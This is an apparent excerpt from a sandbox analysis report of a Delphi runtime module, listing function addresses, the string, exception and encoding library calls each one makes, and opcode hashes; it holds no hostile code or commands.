                                                                                                  • Instruction ID: 3f1c98fecfe68b52bf16856e5ff3d398f0e3bde1a59a24ad800dfe1f19cdd018
                                                                                                  • Opcode Fuzzy Hash: e289cbe9458d8958e45cc763ccf8e6ca795d0cba2e6690692d1028c7d287d737
                                                                                                  • Instruction Fuzzy Hash: 6CF0F9303062855BEB04EBA5FC7295AB3DECF99358BD14276A900C3303DA60DC254690
                                                                                                  APIs
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C72
                                                                                                    • Part of subcall function 500087FC: @System@@NewAnsiString$qqrius.RTL120(?,?,500056AE,00000000), ref: 50008821
                                                                                                    • Part of subcall function 500087FC: @System@Move$qqrpxvpvi.RTL120(00000000,?,500056AE,00000000), ref: 5000882D
                                                                                                    • Part of subcall function 500087FC: @System@@FreeMem$qqrpv.RTL120(500056AE,00000000), ref: 5000884F
                                                                                                  • @System@@LStrSetLength$qqrv.RTL120(?,?,?,500056AE,00000000), ref: 50008C5B
                                                                                                    • Part of subcall function 5000925C: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 50009281
                                                                                                    • Part of subcall function 5000925C: @System@@ReallocMem$qqrrpvi.RTL120(?,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 5000929E
                                                                                                    • Part of subcall function 5000925C: @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,?,50008CA1,?,?,?,500056AE,00000000), ref: 500092B7
                                                                                                  • @System@Move$qqrpxvpvi.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C81
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(00000000,?,?,?,500056AE,00000000), ref: 50008C8E
                                                                                                  • @System@@LStrSetLength$qqrv.RTL120(?,?,?,500056AE,00000000), ref: 50008C9C
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$AnsiClr$qqrpvLength$qqrvMove$qqrpxvpvi$Asg$qqrpvpxvFreeFromMem$qqrpvMem$qqrrpviReallocStr$qqrr27StringString$qqriusStringusSystem@%T$us$i0$%x20Unicode
                                                                                                  • String ID:
                                                                                                  • API String ID: 2086941991-0
                                                                                                  • Opcode ID: c11578e97b51d0ebb740e0e0c89a11e6e1b3a7aca5931f475eef3c08a106609f
                                                                                                  • Instruction ID: 70c44d853572e2918cefb12b18bb5fbd04c90bfbcf4b79bc5922f659862d1e0c
                                                                                                  • Opcode Fuzzy Hash: c11578e97b51d0ebb740e0e0c89a11e6e1b3a7aca5931f475eef3c08a106609f
                                                                                                  • Instruction Fuzzy Hash: 9E01D4347020904BFB18D759D8B0A2DB3F2BFD5201BA4836EE284CB359DAB19C0187A2
                                                                                                  APIs
                                                                                                  • @Sysutils@SysErrorMessage$qqrui.RTL120(00000000,5002A99F,?,00000000), ref: 5002A940
                                                                                                    • Part of subcall function 50025B28: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B47
                                                                                                    • Part of subcall function 50025B28: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B69
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5002A99F,?,00000000), ref: 5002A962
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,5002A99F,?,00000000), ref: 5002A978
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,5002A99F,?,00000000), ref: 5002A984
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@Sysutils@Unicode$Exception@$bctr$qqrp20Recxi$Asg$qqrr20CharClassClassoCreate$qqrp17ErrorExcept$qqrvFormatFormat$qqrx20FromLen$qqrr20LoadMessageMessage$qqruiMetaRaiseRecpx14String$qqrp20StringpbiStringpx14Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1617757611-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 500282F2
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 5002830D
                                                                                                  • @Sysutils@StrCharLength$qqrpxb.RTL120(00000000,50028338,?,?,00000001,?,?,50026115,00000000,50026237,?,?,?,?,00000000,00000000), ref: 5002831B
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$CharChar$qqrx20InternalLength$qqrpxbSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 3042977434-0
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120(00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 5002847E
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284AE
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284C7
                                                                                                  • @Sysutils@StrCharLength$qqrpxc.RTL120(00000000,500284EE,?,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284CF
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(500284F5,00000000,?,?,?,50027A9B,00000000,50027ABC), ref: 500284E8
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharChar$qqrx27Clr$qqrpvInternalLength$qqrpxcRef$qqrpvSysutils@T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 2156883435-0
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 5001D8EE
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5001D956), ref: 5001D91B
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D956), ref: 5001D92E
                                                                                                  • @Sysutils@StrLCopy$qqrpcpxcui.RTL120(00000000,5001D956), ref: 5001D939
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5001D95D), ref: 5001D950
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$Char$qqrx27Clr$qqrpvCopy$qqrpcpxcuiInternalRef$qqrpvSysutils@T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 225901233-0
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002E0F3
                                                                                                  • GetCPInfo.KERNEL32(5002E1B0,?,00000000), ref: 5002E113
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(5002E1B0,?,00000000), ref: 5002E129
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(5002E1B0,?,00000000), ref: 5002E12E
                                                                                                  • @System@@AfterConstruction$qqrp14System@TObject.RTL120(5002E1B0,?,00000000), ref: 5002E146
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@$AfterClassClassoConstruction$qqrp14Create$qqrp17Except$qqrvException@$bctr$qqrp20InfoMetaObjectRaiseStringSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2125405577-0
                                                                                                  APIs
                                                                                                  • @System@@LStrAddRef$qqrpv.RTL120 ref: 50028356
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,500283C6), ref: 50028388
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500283C6), ref: 500283A1
                                                                                                  • @Sysutils@StrCharLength$qqrpxc.RTL120(00000000,500283C6), ref: 500283A9
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(500283CD), ref: 500283C0
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$AnsiStringSystem@%$FromStr$qqrr27StringusSystem@T$us$i0$%x20Unicode$CharChar$qqrx27Clr$qqrpvInternalLength$qqrpxcRef$qqrpvSysutils@T$us$i0$%
                                                                                                  • String ID:
                                                                                                  • API String ID: 2156883435-0
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001D9D8), ref: 5001D99D
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5001D9D8), ref: 5001D9B0
                                                                                                  • @Sysutils@StrLCopy$qqrpbpxbui.RTL120(00000000,5001D9D8), ref: 5001D9BB
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20Copy$qqrpbpxbuiInternalSysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 1472205855-0
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500269ED
                                                                                                  • @Sysutils@LoadStr$qqri.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A0F
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A1D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026A4E,?,?,?,?,00000000,00000000), ref: 50026A28
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 50026A89
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AAB
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AB9
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026AEA,?,?,?,?,00000000,00000000), ref: 50026AC4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002672D
                                                                                                  • @Sysutils@LoadStr$qqri.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 5002674F
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 5002675D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(?,00000000,50026788,?,?,?,?,00000000,00000000), ref: 50026768
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                  • @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                  • @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500105AC
                                                                                                  • @System@TObject@ClassName$qqrv.RTL120(00000000,50010608), ref: 500105C6
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,50010608), ref: 500105E8
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,50010608), ref: 500105ED
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@DynArrayAddRef$qqrv.RTL120(?,?,00000000), ref: 5002D21E
                                                                                                  • @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,00000000,5002D27D,?,?,?,00000000), ref: 5002D241
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,?), ref: 5002DC60
                                                                                                    • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(?,?), ref: 5002DC65
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DC88
                                                                                                    • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DC8D
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCB0
                                                                                                    • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCB5
                                                                                                    • Part of subcall function 5002DC38: @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002DCBC
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002DCE1
                                                                                                    • Part of subcall function 5002DC38: @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002DCE6
                                                                                                    • Part of subcall function 5002DC38: @Sysutils@TEncoding@GetCharCount$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,?,?), ref: 5002DCF3
                                                                                                    • Part of subcall function 5002DC38: @System@@DynArraySetLength$qqrv.RTL120(?,?,?,?), ref: 5002DD0D
                                                                                                  • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%.RTL120(?,?,00000000,5002D27D,?,?,?,00000000), ref: 5002D24E
                                                                                                    • Part of subcall function 5002D730: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                    • Part of subcall function 5002D730: @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                    • Part of subcall function 5002D730: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                    • Part of subcall function 5002D730: @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D284,5002D27D,?,?,?,00000000), ref: 5002D269
                                                                                                    • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                    • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D284,5002D27D,?,?,?,00000000), ref: 5002D277
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • GetProcAddress.KERNEL32(?,?), ref: 5000E8A8
                                                                                                  • @System@@LStrFromPWChar$qqrr27System@%AnsiStringT$us$i0$%pbus.RTL120(00000000,5000E8E7,?,?,?,00000000), ref: 5000E8BB
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000E8E7,?,?,?,00000000), ref: 5000E8C3
                                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 5000E8CA
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(5000E8EE,?,?,00000000), ref: 5000E8E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000), ref: 5002CE17
                                                                                                    • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                    • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000), ref: 5002CE12
                                                                                                    • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                    • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                    • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                    • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000), ref: 5002CE39
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000), ref: 5002CE3E
                                                                                                  • @System@@DynArraySetLength$qqrv.RTL120(?), ref: 5002CE52
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 5002C0D9
                                                                                                  • @System@TObject@$bctr$qqrv.RTL120 ref: 5002C0E8
                                                                                                  • @Sysutils@TStringBuilder@set_Capacity$qqri.RTL120 ref: 5002C0F9
                                                                                                  • @Sysutils@TStringBuilder@Append$qqrx20System@UnicodeString.RTL120 ref: 5002C107
                                                                                                  • @System@@AfterConstruction$qqrp14System@TObject.RTL120 ref: 5002C112
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243CD
                                                                                                    • Part of subcall function 500089A4: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(50006B15,00000000,50006B69), ref: 500089B7
                                                                                                  • @System@@UStrLen$qqrx20System@UnicodeString.RTL120(00000000,50024403), ref: 500243D2
                                                                                                  • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,50024403), ref: 500243DE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@DynArrayAddRef$qqrv.RTL120(?,?,00000000), ref: 5002D1AA
                                                                                                  • @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%.RTL120(00000000,5002D201,?,?,?,00000000), ref: 5002D1C5
                                                                                                    • Part of subcall function 5002DC14: @System@@DynArrayLength$qqrv.RTL120(?,?,?,5002D1CA,00000000,5002D201,?,?,?,00000000), ref: 5002DC1F
                                                                                                    • Part of subcall function 5002DC14: @Sysutils@TEncoding@GetChars$qqrx25System@%DynamicArray$tuc%ii.RTL120(?,00000000,?,?,?,5002D1CA,00000000,5002D201,?,?,?,00000000), ref: 5002DC2C
                                                                                                  • @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%.RTL120(00000000,5002D201,?,?,?,00000000), ref: 5002D1D2
                                                                                                    • Part of subcall function 5002D730: @Sysutils@TEncoding@GetByteCount$qqrx24System@%DynamicArray$tb%.RTL120(?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D73E
                                                                                                    • Part of subcall function 5002D730: @System@@DynArraySetLength$qqrv.RTL120(00000000,?,?,?,?,5002D1D7,00000000,5002D201,?,?,?,00000000), ref: 5002D753
                                                                                                    • Part of subcall function 5002D730: @System@@DynArrayLength$qqrv.RTL120 ref: 5002D75D
                                                                                                    • Part of subcall function 5002D730: @Sysutils@TEncoding@GetBytes$qqrx24System@%DynamicArray$tb%iir25System@%DynamicArray$tuc%i.RTL120(00000000,?,00000000), ref: 5002D76C
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D208,?,?,00000000), ref: 5002D1ED
                                                                                                    • Part of subcall function 5000C214: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C23F
                                                                                                    • Part of subcall function 5000C214: @System@@FreeMem$qqrpv.RTL120(?,5000B022,?,?,?,?,5000AF01,?,?,?,50006C67,?,?,50006BAA), ref: 5000C247
                                                                                                  • @System@@DynArrayClear$qqrrpvpv.RTL120(5002D208,?,?,00000000), ref: 5002D1FB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  APIs
                                                                                                  • @System@@InitializeRecord$qqrpvt1.RTL120 ref: 5001B905
                                                                                                    • Part of subcall function 5000AE00: @System@@InitializeArray$qqrpvt1ui.RTL120 ref: 5000AE24
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B958), ref: 5001B920
                                                                                                  • @System@EnumResourceModules$qqrpqqripv$opv.RTL120(00000000,5001B958), ref: 5001B92D
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001B958), ref: 5001B937
                                                                                                  • @System@@FinalizeRecord$qqrpvt1.RTL120(5001B95F), ref: 5001B952
                                                                                                    • Part of subcall function 5000AED8: @System@@FinalizeArray$qqrpvt1ui.RTL120(?,?,?,50006C67,?,?,50006BAA), ref: 5000AEFC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$Unicode$Array$qqrpvt1uiAsg$qqrr20FinalizeInitializeRecord$qqrpvt1StringStringx20$EnumModules$qqrpqqripv$opvResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 2269274692-0
                                                                                                  APIs
                                                                                                  • @Sysutils@StrNextChar$qqrpxb.RTL120 ref: 50022D1F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrpxbNextSysutils@
                                                                                                  • String ID: H
                                                                                                  • API String ID: 518225700-2852464175
                                                                                                  APIs
                                                                                                  • @System@@FillChar$qqrpvib.RTL120 ref: 50003991
                                                                                                  • VirtualQuery.KERNEL32(00000000,?,0000001C), ref: 50003A25
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Char$qqrpvibFillQuerySystem@@Virtual
                                                                                                  • String ID: <JP$jP
                                                                                                  • API String ID: 2244405464-1976356052
                                                                                                  APIs
                                                                                                  • @System@@_llumod$qqrv.RTL120(0000000A,00000000), ref: 5000B978
                                                                                                  • @System@@_lludiv$qqrv.RTL120(0000000A,00000000), ref: 5000B993
                                                                                                  • @System@@SetLength$qqrp28System@%SmallString$iuc$255%uc.RTL120 ref: 5000B9F2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: Length$qqrp28SmallString$iuc$255%ucSystem@%System@@System@@_lludiv$qqrvSystem@@_llumod$qqrv
                                                                                                  • String ID: -
                                                                                                  • API String ID: 1433924716-2547889144
                                                                                                  APIs
                                                                                                  • @Character@TCharacter@IsLatin1$qqrb.RTL120 ref: 50011B75
                                                                                                  • @Character@TCharacter@Initialize$qqrv.RTL120 ref: 50011BAF
